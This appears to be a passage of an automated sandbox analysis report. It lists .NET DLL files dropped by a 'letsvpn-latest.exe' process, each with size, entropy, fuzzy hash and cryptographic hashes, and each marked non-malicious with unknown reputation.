                                                                                                                                                                                                  SHA1:1FC2132D66E81FAC944C924C70BC7196728742BB
                                                                                                                                                                                                  SHA-256:E435FC7019E698A9EA77EF2D8C857E206A67F61EA26D54223EE5700A95D85983
                                                                                                                                                                                                  SHA-512:25D9DF05350FE3A03B8C4FBA186E62930CE1943F5AA52A77C60767ACA5B2AD7B99130950149F62410123E704582154EE958EA54AF5A31ED3DE31F2010D39D702
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):35872
                                                                                                                                                                                                  Entropy (8bit):6.320710151085161
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:k44bN5hwABzKGUn11fF+1WSq3b2KZBZGS+ST6nkNiT:k5bLhLBzcn1gW93qKA/meT
                                                                                                                                                                                                  MD5:A620A68A1816FDE03C3D7654B8CDE81D
                                                                                                                                                                                                  SHA1:DD84D590F2C2D4D6663B705669E6DA477FFD9284
                                                                                                                                                                                                  SHA-256:38A0922D0F78A6CC5C31A28994ECFA1956E280AA76F24B0D52E4863B08ECA47C
                                                                                                                                                                                                  SHA-512:1FFEF524BDDF5E9F7BDB7489F5EAC5933B305F080303BD315B779DD42FD578CA7CB353ED4C29F41244BE23E4FC89AFE329A27240DFC0087ED881431E1C52D7A7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.962051100154249
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:OBhwI7WSQWMhqWOHlLf2KQcvBZ9ZNdS+ShjmM6IGBkSh:ODwIBCq3b2KZBZbS+ST6nkK
                                                                                                                                                                                                  MD5:62AB75D88CC45203A838FA86CAAF189D
                                                                                                                                                                                                  SHA1:2F5A9349B011E54677C30ADD9DDE2E11CF0088D9
                                                                                                                                                                                                  SHA-256:430C25AA7A3D839D77BDAFCC31DDB85670C3E5A6CF7DBD59361A7262466C511E
                                                                                                                                                                                                  SHA-512:0132E274C13147D5B4767345F223882F23D2A4FCB69D708728EF7E8ACF6E2A67814B76F5E508384B15FDA94C2636D98C2C101B5C756459CE611BF815F793E278
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.978691087340885
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6yvPRW4lWnhqWOHlLf2KQcvBZ99LZ5S+ShjmM6IGBkSks:/396q3b2KZBZXzS+ST6nk2
                                                                                                                                                                                                  MD5:468045C4B51E0F07C15C5F469F6A362C
                                                                                                                                                                                                  SHA1:DBCF255A9A6C3E2B733988664D64D05373C967BD
                                                                                                                                                                                                  SHA-256:E9DEC41A2F095B3F448CEAE1CBB3D782AEDADBB6E941D0AF7984523E253F0BBD
                                                                                                                                                                                                  SHA-512:97BCC2719C9BECAF1A9BFF8CD597F56A1AE6C148C19DDFFFCD3819BA3B97E6107FFD7D8F76F81E29542DA9BFE73DC36E8DAA42CB51E55A74B6644E828F7856FE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.925806153080495
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:n6RW6eWghqWOHlLf2KQcvBZ9SbgnnYOS+ShjmM6IGBkSm:n67Aq3b2KZBZlnnYOS+ST6nkN
                                                                                                                                                                                                  MD5:6EF67383B90630472B4DBE9D61D51D9C
                                                                                                                                                                                                  SHA1:169492A2BE06CC2EA9F476B981DAB0F0F8E35243
                                                                                                                                                                                                  SHA-256:4F28221729A3093D3F3E403EB6121234D69387D902C5026B298BF3CC58074159
                                                                                                                                                                                                  SHA-512:D155F67B9602FCEF1F2EB88648BE5F472FA75E5423360DB3B041B7A512B720743971177254D7D8E8A5F0A8FFF4B4D9D862ACB3E134A1D623F66F2CA94520743B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.960222514973397
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ESUP9W70WhhqWOHlLf2KQcvBZ9mnLF9YS+ShjmM6IGBkSM:hUeRq3b2KZBZsIS+ST6nkT
                                                                                                                                                                                                  MD5:E0ED9475D368E11A5EBF2FEE0DB4AA8D
                                                                                                                                                                                                  SHA1:D8652BBFE2912F6A3B2FC1CD32230A7A8504C3D5
                                                                                                                                                                                                  SHA-256:02A0AA03887A2F13F6993BC1FF589167A72E9233DA9BFEA8D06F39A1F4E3E452
                                                                                                                                                                                                  SHA-512:7561AE8F0C976817C5DACE0F87ED39D35E7B3FF8DD5D7D3DB03472FB6E484B3359C715490BEED3A7E11DC67F3CE0505CB4A5256D79404300C53708BC3F1CF832
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.956007202011485
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:58yg07W0/WohqWOHlLf2KQcvBZ9gXsS+ShjmM6IGBkSs:5BHZq3b2KZBZBS+ST6nk7
                                                                                                                                                                                                  MD5:6EBBEFC03F03C1DC559F41D9C11CD702
                                                                                                                                                                                                  SHA1:0F2FA9B0BE3AAD5B36DED4481A1339D811ABAA52
                                                                                                                                                                                                  SHA-256:F90DE9000C6D747B69443B3754E1BA110AC88709A1BC27E88FBB304B63F0B019
                                                                                                                                                                                                  SHA-512:741AF8C09090A289C3D88E5B8D89E9CA6FBD54C1A6E62DCC71A6CF1F8AE40D45C322AB02EA3785BCD07BA8EC89597CE0E2CBDB16010BBBF218AFC925B831CDBC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.926537737305858
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Se1WmRWQhqWOHlLf2KQcvBZ9Mo+JS+ShjmM6IGBkSJ3:Sej3q3b2KZBZPwS+ST6nkc3
                                                                                                                                                                                                  MD5:69C49A0199ECD4366220BD0718C8123F
                                                                                                                                                                                                  SHA1:CCDC0B518FC549DF6DA6C8D4E9E29615EB74B773
                                                                                                                                                                                                  SHA-256:255BF1A913BED63A302FF334A49D3CDA16064E17D032883F517634A6E09CEAF1
                                                                                                                                                                                                  SHA-512:80F90E045F79915C38C8413F16A0F8A15B02F4694FB387FFEBD67A1A7A78369AD2AF6EF64232635EBA972DF8F391117B72F128703EC8F9F6BFC76A836D5B8937
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):366112
                                                                                                                                                                                                  Entropy (8bit):5.913155732487538
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:4A0HY8o04jatc9MCELK5h+BO2L1fsqF030f0:4A0HYnitRCOFOI1Wv
                                                                                                                                                                                                  MD5:140C261BA8A0CFC9CDF37B9B84D3A5D7
                                                                                                                                                                                                  SHA1:203FB8572956AD08EECB32217A261FE9C084D6AE
                                                                                                                                                                                                  SHA-256:BE6BDEECE5499E95B1C2CD138980171FD762D37CF3CA66807F1D556D497634CA
                                                                                                                                                                                                  SHA-512:BB754F877D0AE780F5BB1F29B966E8B8F14240304B108537319B2212F9B419656E4F75E0CA983092D69CCEC0ABF34F8B6B0A8F720A383C91D809A5CB3C9D8579
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):143904
                                                                                                                                                                                                  Entropy (8bit):6.189282219926361
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:kUGrszKKLB8a9DvrJeeesIf3amN32AW/rcesL/R:nB8l3/aK32Bc
                                                                                                                                                                                                  MD5:A4C44C10DD8CF211B874DF927FC6982E
                                                                                                                                                                                                  SHA1:C6B01D97636D3D2555754D09BAA00B01029A3B49
                                                                                                                                                                                                  SHA-256:94EE25A9E39BB2CC16A21340F4E18B1D19F32DE920A9233754F4A84142122CBB
                                                                                                                                                                                                  SHA-512:0499CCF78F79E4A0D8A71F201471F17181B6C2A35048D219F7F689029FAEF9AEA71D89DCAB8E8A8CB719413D364623D1B7FE2D8FE1DC7D7A3EAA0AC3886A3A9F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):194080
                                                                                                                                                                                                  Entropy (8bit):6.134658606305299
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:aeruQlNGOhYq0AQcTvankc+8lbKta4FUPAT8xpRI454I/Kv6RpZ8dwPSgQo/yV:bW60VcTvakcXcApOXDV
                                                                                                                                                                                                  MD5:1687F3EF97F927F0ADFBE36929435735
                                                                                                                                                                                                  SHA1:037F0E044A87E6629C5157DF735F395F1295A7F5
                                                                                                                                                                                                  SHA-256:580BCDF39C8795A5A157FC5B6A5A81BD91B388FBA1215A00ACA2DC58C87846A7
                                                                                                                                                                                                  SHA-512:59776468CC0B16E851653C841C8EEEEB26BC9ECC46A94A221FE409EB0467161FDCA504115B9EC69573103BABF8623CC4C41793E5A5CD1FB5D5406D1280535AA7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):38432
                                                                                                                                                                                                  Entropy (8bit):6.461441279464388
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:sVc1GUMB/z6XmY/iee5jq3b2KZBZqS+ST6nk8:sVcHMBm/ieWe3qKk/ma
                                                                                                                                                                                                  MD5:1E33798478F9452D30F03DAE6D1CDF19
                                                                                                                                                                                                  SHA1:B8E1560EA09E66746FFD869588E5E85E8C561713
                                                                                                                                                                                                  SHA-256:491C289BCB0634CAF386E0B175B548D0DD4C69EC44C74E31612B8A3B4B5EEDBB
                                                                                                                                                                                                  SHA-512:FCC55D7313633A896067E31CDE6BB13E0BEC48BBCD32E75384430F25985CECB51F1080C69D6724BAA6973058317019ED6653539CD89DA2D3621EDDCBDBB2F3BD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.948776506140675
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:m6ZWYLWZhqWOHlLf2KQcvBZ9wX74S+ShjmM6IGBkS4cI:m6l+q3b2KZBZEES+ST6nkBcI
                                                                                                                                                                                                  MD5:645261E4A9B6987F58E2DDBDE079B719
                                                                                                                                                                                                  SHA1:1F1FBCA97959753EB34EE48EBB53B9D7FBED89A4
                                                                                                                                                                                                  SHA-256:6E54116F6B216370C0B56EFF67E65C0C1FC36B9BC64EF2D7C6C99A8D522D6135
                                                                                                                                                                                                  SHA-512:12AA410EA7F9D4C36B947A2F33AB7B743BA795023D3EED547B784A94E58D8F7113C7239BCFB94EC692850DD2137409178F1E9039F2EF9CF79FE2E5E30264A953
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.906079947109159
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:d1W1WMQWKhqWOHlLf2KQcvBZ9WyWS+ShjmM6IGBkSn:S1Aq3b2KZBZWS+ST6nkQ
                                                                                                                                                                                                  MD5:E3A134FCE26AD9447AA9CC22217AFB46
                                                                                                                                                                                                  SHA1:16F12C16877CA2FEFFCA363BAA5478C807A6AFAD
                                                                                                                                                                                                  SHA-256:5E06A39547C752DBCB496541D7D6CD35D31ABB4C2D93017F9069CB6CA5E5B751
                                                                                                                                                                                                  SHA-512:C76EC1D0D7CB548A29CD3E79AFE5D3982C89F0B21D9A6DE2C024E11EBFACD022C8CC892552789158722D889689B6D1C8BB855024FFC78C3BF944023C171E1709
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9354694845948455
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:qdSWSKWxhqWOHlLf2KQcvBZ9WI1HS+ShjmM6IGBkS74:sOjq3b2KZBZsqS+ST6nkr
                                                                                                                                                                                                  MD5:50943D04E6FDBA897F3115A5BEDC4CCD
                                                                                                                                                                                                  SHA1:96372B2760B0E85EB076CE0235381B04BDAD9045
                                                                                                                                                                                                  SHA-256:E4D55BB6B22194E1A1688D53B2F96593B93F5D8DF490AD6EFF7D416D2023B4D2
                                                                                                                                                                                                  SHA-512:EBEB12EB99049FA291160B745250B7105F21941A45FA3206D51F67F78F799EF64D2363A28AC4C5C4A6C0602E668BF0A1E5BE5AE745B1406B986A252AF3243CF9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.864133838979022
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:UJEYA2WkIWhhqWOHlLf2KQcvBZ9pZbS+ShjmM6IGBkSY:UyYA8Zq3b2KZBZhS+ST6nkL
                                                                                                                                                                                                  MD5:2E9048F3BD9B2666999D08460F6270B8
                                                                                                                                                                                                  SHA1:09F1DDF20F750D87161A39342E0597AD417D812D
                                                                                                                                                                                                  SHA-256:43E2003D5DBAB917467CFA17939CB4F499B7DC2A013F2E91915295A393382B1F
                                                                                                                                                                                                  SHA-512:053C7390459C2CE7B103402DA54A87B71B9FFA6B73A55D3CA7FF7BD420D410AB075C1635B4794E31564EA28B275E144C8F33EE13750ECAE7A06B5D549BEE4479
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9801791052871645
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ljJGWe4WIhqWOHlLf2KQcvBZ93vQS+ShjmM6IGBkSaDO:TmOq3b2KZBZWS+ST6nk1K
                                                                                                                                                                                                  MD5:353F86DA020852C31535C10570730236
                                                                                                                                                                                                  SHA1:F323622AB32B5E2C680C774B5ECD37F6A9831C67
                                                                                                                                                                                                  SHA-256:09D926F8783774091E8E16CDE50E1C1A02EB257C6551BE6DE826B49E53905B13
                                                                                                                                                                                                  SHA-512:11F5770EDDB93C78F9EAFA76033E8438B96220B8ACBA95BAD7CCCE478961AD91AB4E4BD7878C852E2817059FAB457C34995C410F40203777A77B05D8F42BC81E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.899550672496046
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:rxdW1w3WesW9hqWOHlLf2KQcvBZ9q7S+ShjmM6IGBkSJ:ru1wxNq3b2KZBZES+ST6nkS
                                                                                                                                                                                                  MD5:D231E241020D93712DE8A195A6A40000
                                                                                                                                                                                                  SHA1:BC6884E64295EA65467C89748EB01563E8D53FA1
                                                                                                                                                                                                  SHA-256:97ECEE66FF62BBF5ECEE95876E18CF9389258A3CF97FA8EBB8381CDE14BFA829
                                                                                                                                                                                                  SHA-512:11652F0CC85136AA9AAFBA7E0611E6196AD8E912604E5A40A4323B413A70C4943F67E90E5B6B8578A7710FAB9EBEFB412A93CF8E0919810D4198FEBECAB76D2C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26144
                                                                                                                                                                                                  Entropy (8bit):6.6921368213375345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:Hyp12Bhkg3qnV/sErq3b2KZBZgS+ST6nkUu:w12zkg3qV/sE23qKW/mR
                                                                                                                                                                                                  MD5:98DB5D03B1515001435A0FBA8BA52123
                                                                                                                                                                                                  SHA1:646BC0EF11273748ACA1682F036862391C1571F5
                                                                                                                                                                                                  SHA-256:5489D1EE790F9E818BB4DB0042DD105615386B10AEE5ACCE357F32B48BBBAFDB
                                                                                                                                                                                                  SHA-512:75FC8940B4423F9455D18F039D65E1858C3F0A5950B6303640220B15DBBE390479007953ADA5C48BED0236D9DFBF04BE47AE2AE2FD6BA0F27846BD45F4C2B7F7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.96273202505333
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:vHPAW1bWXhqWOHlLf2KQcvBZ9doS+ShjmM6IGBkSuiJl:nrAq3b2KZBZES+ST6nkcl
                                                                                                                                                                                                  MD5:F672FB804EA4BAB0D33ACA3113EFBB80
                                                                                                                                                                                                  SHA1:EF9535A08CB9F9ECF79064BBA08A9DD1CFE544DE
                                                                                                                                                                                                  SHA-256:E8B42014F94A851E2E66AB964E8D96FDCC6E53492F79939C5E8392D7023630A2
                                                                                                                                                                                                  SHA-512:DE03A0697BC307068E40CC7C222212D14E3111ED053F951F7A322145AB2401BE2B82DF31D8900A9869BB42A1E99907B43469806A1858F856B7EBA3DBA7691B5F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.961231388184548
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:WNoqWD7WehqWOHlLf2KQcvBZ9LYWnS+ShjmM6IGBkSEO:WNofXq3b2KZBZacS+ST6nku
                                                                                                                                                                                                  MD5:A1F43C6D3477069B1B95862F64AEBBBA
                                                                                                                                                                                                  SHA1:64F5CF2A3339AB312CE62F0C4798B8B593EF31A0
                                                                                                                                                                                                  SHA-256:964560E4A4B6F28313374D54E91AAB94B7E8D69EF602BF8097B542E2C24CAEF1
                                                                                                                                                                                                  SHA-512:833C5004DE4A309139F077971DED62A62D45D58EE91DA86F53BAA4F1ADB36DABD0A9F754A263F35A11E6F76726E115794AFD387F1A94C80100B0DFC1979A8391
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.971342636879885
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:3GETSAWUEWWhqWOHlLf2KQcvBZ9ifYS+ShjmM6IGBkSx:rT18q3b2KZBZyYS+ST6nkG
                                                                                                                                                                                                  MD5:E0E4EF5AEA0AE7E6BC065FFEB26CD09B
                                                                                                                                                                                                  SHA1:8B17220D5815337590549CAF18784A66485D3E76
                                                                                                                                                                                                  SHA-256:AF3258FCF4FBE8B8A0A89AFEAC28E487A8BEAD824465C5A24B773197C5E27C5F
                                                                                                                                                                                                  SHA-512:302391EFDD8D40A07498C77E8CB0ADA87B0898ACEDDFACFAC53026A19746B5694E05107C84B85CDBD56B5F0A2D6AFD2C310FE7D990CEB91774334C7C591185CD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):111648
                                                                                                                                                                                                  Entropy (8bit):5.56134106992795
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:kPOw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/f3qKfuo/m1:kWw0SUUKBM8aOUiiGw7qa9tK/fio/O
                                                                                                                                                                                                  MD5:44D0AB5E4D54C2EDB7C8FBA9CED026ED
                                                                                                                                                                                                  SHA1:04328EE0F3BBCD8D0567A530431FFCF24CFF58B7
                                                                                                                                                                                                  SHA-256:FBB6E048E1A2FBB2EE2A9D20070DFF1D91155670F37241960B3F119F5DBE4ED1
                                                                                                                                                                                                  SHA-512:B7E31CC9F9C86F2F31B8340EFF76F9777402AD0B0D470B5D8245D2B0067F1F101C0E84218ED8CE7BE9DDA217FC5EA5808155133E3FA2709292252E9BEA0B9EC2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.953385301880804
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:KcDagtDApWSKJWmhqWOHlLf2KQcvBZ9AQSS+ShjmM6IGBkSl:KPKBlq3b2KZBZSS+ST6nki
                                                                                                                                                                                                  MD5:B0F855439076CBAE234ADC363FA0454A
                                                                                                                                                                                                  SHA1:AA2AFB641C8AC4FD2A4796877A77C846AA287259
                                                                                                                                                                                                  SHA-256:4FC68C92932A97435D5996357A89BD6995449591777795E9A42C5063243550C7
                                                                                                                                                                                                  SHA-512:708C1F9B0593CE52A76AE33117C5736BA7B2C4BF006A6D1CF9925550D2620FDB8BA963800863CF89958CBD6AED803419F1C71449D458B50F585327CA9AE749E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.962671992726357
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:7IWD4WkhqWOHlLf2KQcvBZ9TW4rS+ShjmM6IGBkSW:71Sq3b2KZBZI4rS+ST6nkd
                                                                                                                                                                                                  MD5:B01A80E33A269BF097DBD547BB235468
                                                                                                                                                                                                  SHA1:4BE2ADF5E7EF0BE39D2D917B7B91460396CF8D41
                                                                                                                                                                                                  SHA-256:ABA7106AAA97C956C535990A878CE66DEFE54F064C7616DD2DBF8A9EB6D44ACE
                                                                                                                                                                                                  SHA-512:39FD2FCCEC11F6906CFE453FFE784A98762918BDBB82C47868CC7E3F6CA4EC314DA717D3F3BF5DF50274D9026BF4DBCE5271BD485710BF3A88F471F714705C1B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.89896808782791
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:BMWzQWjhqWOHlLf2KQcvBZ9RDS+ShjmM6IGBkS5Pz:B5rq3b2KZBZbS+ST6nkWb
                                                                                                                                                                                                  MD5:264B3192B5C2C364C8B9AE2790B19153
                                                                                                                                                                                                  SHA1:92CD47F6707C0C598A23973C27BDA209108E0D7B
                                                                                                                                                                                                  SHA-256:06B51B094FAF31639B7B3F7B9569BC7B46A24BFB4BF4E726854503AA3B558C19
                                                                                                                                                                                                  SHA-512:A1CAFAB90CDAE27CB71BEFEE3BDAF8981E93D5B8C11E1E27186C6B721BC2BE05C2DADA828D723A3E3EBFF4AE3C93736472ED9BE645815FE5E1262AC514E0B182
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.840362171078928
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:+xDHKWAMW7hqWOHlLf2KQcvBZ93WXS+ShjmM6IGBkSMZLT:aD8jq3b2KZBZAXS+ST6nkrtT
                                                                                                                                                                                                  MD5:CA9071B879DFAEF54855D52E3DE0B199
